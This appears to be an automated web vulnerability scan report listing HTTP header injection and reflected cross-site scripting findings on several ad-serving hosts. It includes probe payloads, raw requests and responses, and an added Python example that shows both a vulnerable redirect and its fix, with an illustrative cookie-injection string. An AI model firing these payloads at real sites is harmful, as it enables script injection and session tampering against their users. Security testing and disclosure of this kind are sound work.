GET /appointment-scheduling'/ HTTP/1.1 Host: www.patlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 15:05:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8950
<html> <head> <title>Expression must evaluate to a node-set.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p ...[SNIP]... </b>System.Xml.XPath.XPathException: Expression must evaluate to a node-set.<br> ...[SNIP]... <pre>
[XPathException: Expression must evaluate to a node-set.] MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeType) +3961158 MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +77 MS.Internal.Xml.XPath.XPathParse ...[SNIP]...
5. HTTP header injection
There are 10 instances of this issue:
The value of REST URL parameter 1 is copied into the Location response header. The payload 82519%0d%0a8220753ce5b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 46093%0d%0aba45031a507 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload fd770%0d%0a517a9219aec was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the exch request parameter is copied into the x-mm-debug response header. The payload d49c0%0d%0a33877e5090a was submitted in the exch parameter. This caused a response containing an injected HTTP header.
The value of the lid request parameter is copied into the Location response header. The payload 9cbce%0d%0a676b5b556a6 was submitted in the lid parameter. This caused a response containing an injected HTTP header. In the response below the injected CRLF appears as a space between 9cbce and 676b5b556a6 because this report joins response lines; in the raw response the bytes after %0d%0a begin a new header line, which is what makes the finding exploitable.
Request
GET /link/tplimage?lid=9cbce%0d%0a676b5b556a6&pubid=21000000000176230 HTTP/1.1 Host: clickserve.cc-dt.com Proxy-Connection: keep-alive Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 13:29:00 GMT Server: Apache/1.3.41 (Unix) Location: http://gan.doubleclick.net/gan_impression?lid=9cbce 676b5b556a6&pubid=21000000000176230 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 02 May 2011 13:29:00 GMT Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=9cbc ...[SNIP]...
The value of the pubid request parameter is copied into the Location response header. The payload 391ec%0d%0a7c35b386e75 was submitted in the pubid parameter. This caused a response containing an injected HTTP header.
Request
GET /link/tplimage?lid=41000000027557560&pubid=391ec%0d%0a7c35b386e75 HTTP/1.1 Host: clickserve.cc-dt.com Proxy-Connection: keep-alive Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 13:29:08 GMT Server: Apache/1.3.41 (Unix) Location: http://gan.doubleclick.net/gan_impression?lid=41000000027557560&pubid=391ec 7c35b386e75 Cneonction: close Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 02 May 2011 13:29:08 GMT Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=4100 ...[SNIP]...
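The lid and pubid findings above, reproduced offline as an added example (not from the report or from the clickserve.cc-dt.com redirector). A raw 302 is assembled the way a vulnerable handler would, with the decoded parameter pasted into Location, then split into header lines to show the injected text arriving as a header of its own. The Set-Cookie variant is an illustration of what an attacker would put after the CRLF; the report only used a random marker.

```python
"""Header injection through a redirector parameter, and the check that stops it."""
from urllib.parse import quote, unquote

TARGET = "http://gan.doubleclick.net/gan_impression"      # from the report
MARKER_PAYLOAD = unquote("9cbce%0d%0a676b5b556a6")            # the scanner's probe, decoded
COOKIE_PAYLOAD = "9cbce\r\nSet-Cookie: glam_sid=attacker"     # illustrative follow-up


def _response(location: str) -> bytes:
    return (f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n"
            "Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
            "<html><body><h1>Found</h1></body></html>").encode("latin-1")


def redirect_vulnerable(lid: str, pubid: str) -> bytes:
    """BAD: request values concatenated straight into the header."""
    return _response(f"{TARGET}?lid={lid}&pubid={pubid}")


def redirect_safe(lid: str, pubid: str) -> bytes:
    """Percent-encode each value, then refuse any CR/LF that remains."""
    location = f"{TARGET}?lid={quote(lid, safe='')}&pubid={quote(pubid, safe='')}"
    if "\r" in location or "\n" in location:
        raise ValueError("CR/LF in header value")
    return _response(location)


def header_lines(raw: bytes) -> list:
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return head.split("\r\n")[1:]            # drop the status line


def injected_headers(raw: bytes, expected=("Location", "Content-Type")) -> list:
    """Header lines that are not one of the headers the handler meant to send."""
    return [line for line in header_lines(raw)
            if line.split(":", 1)[0] not in expected]


if __name__ == "__main__":
    for payload in (MARKER_PAYLOAD, COOKIE_PAYLOAD):
        raw = redirect_vulnerable(payload, "21000000000176230")
        print("vulnerable:", injected_headers(raw))
        print("safe:      ", injected_headers(redirect_safe(payload, "21000000000176230")))
```

Encoding alone is the real fix; the explicit CR/LF test is a backstop for the case where a value reaches the header by some path that skipped the encoder.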
The value of REST URL parameter 1 is copied into the Location response header. The payload 1594f%0d%0ad8816df24f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://media.fastclick.net/1594f d8816df24f9/g ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 9f542%0d%0a08d857cb4c0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://media.fastclick.net/w/9f542 08d857cb4c0 ...[SNIP]...
The value of the S cookie is copied into the Set-Cookie response header. The payload 5cdd4%0d%0af376d10c369 was submitted in the S cookie. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://media.fastclick.net/w/get.media?sid=5396 ...[SNIP]...
The value of the gname request parameter is copied into the Set-Cookie response header. The payload 4d3ab%0d%0a9f9bde70083 was submitted in the gname parameter. This caused a response containing an injected HTTP header.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fa2f0<script>alert(1)</script>b1f522a3374 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 192cc<script>alert(1)</script>0d7dd038fa4 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
6.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /c3VTabstrct-6-2.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7a33<script>alert(1)</script>26cb5890d6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 2133b<script>alert(1)</script>1241548eef4 was submitted in the rv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f7222<script>alert(1)</script>307d61967c was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d9e6d<script>alert(1)</script>e50c464bbef was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 923f8<script>alert(1)</script>0bafb8900a2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fe0cf<script>alert(1)</script>58e0387d345 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:49 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s7; path=/
Cache-control: private
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 65d60<script>alert(1)</script>95aa5c7e076 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c745b'-alert(1)-'4ace195dc06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:58:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:50 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5855b'-alert(1)-'ab23faff340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:59:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:18 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4910a'-alert(1)-'28bda3ed599 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:59:33 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:33 GMT
The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d284'-alert(1)-'03c000bc2e was submitted in the anx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:57:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:57:45 GMT
6.14. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/6a.orbitcast/tech.general.ros/other
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b379'-alert(1)-'7cb02ce77db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 532
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:58:17 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:17 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbb5'-alert(1)-'5fcdaad9d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 437
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:48 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:48 GMT
6.16. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.guardian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bbd'-alert(1)-'1d315ad8d9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 441
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:46 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:46 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fe83'-alert(1)-'af780e57a1c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 438
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:44 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:44 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f26dd'-alert(1)-'74c9b80dd6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:59:34 GMT
Connection: close
Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-57634638_1304348374","http://ad.doubleclick.net/adjf26dd'-alert(1)-'74c9b80dd6b/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-57634638_1304348374,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee8db'-alert(1)-'c950acb7221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:00 GMT
Connection: close
Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-13048608_1304348400","http://ad.doubleclick.net/adj/6a.orbitcastee8db'-alert(1)-'c950acb7221/tech.general.ros/other;net=6a;u=,6a-13048608_1304348400,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x9 ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f71a'-alert(1)-'368975efe8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:22 GMT
Connection: close
Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-99110641_1304348422","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros8f71a'-alert(1)-'368975efe8c/other;net=6a;u=,6a-99110641_1304348422,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=738 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15cc'-alert(1)-'5d32a32f2c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:55 GMT
Connection: close
Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-85532793_1304348455","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/otherd15cc'-alert(1)-'5d32a32f2c1;net=6a;u=,6a-85532793_1304348455,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=7385;cont ...[SNIP]...
The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3350f'-alert(1)-'0a71c06d7f7 was submitted in the anx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:57:46 GMT
Connection: close
Content-Length: 7290
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... AndAttachAd("6a-76473120_1304348266","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-76473120_1304348266,11f8f328940989e,none,dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=3350f'-alert(1)-'0a71c06d7f7;contx=none;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_m;btg=cm.music_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 115fb"-alert(1)-"85e938b1609 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:09 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... MW_X3_300x125_14Mar2011.gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329115fb"-alert(1)-"85e938b1609&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0a77'-alert(1)-'22b0344f2f7 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:14 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329d0a77'-alert(1)-'22b0344f2f7&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57e6"-alert(1)-"48b41a44627 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:20 GMT
Content-Length: 6343
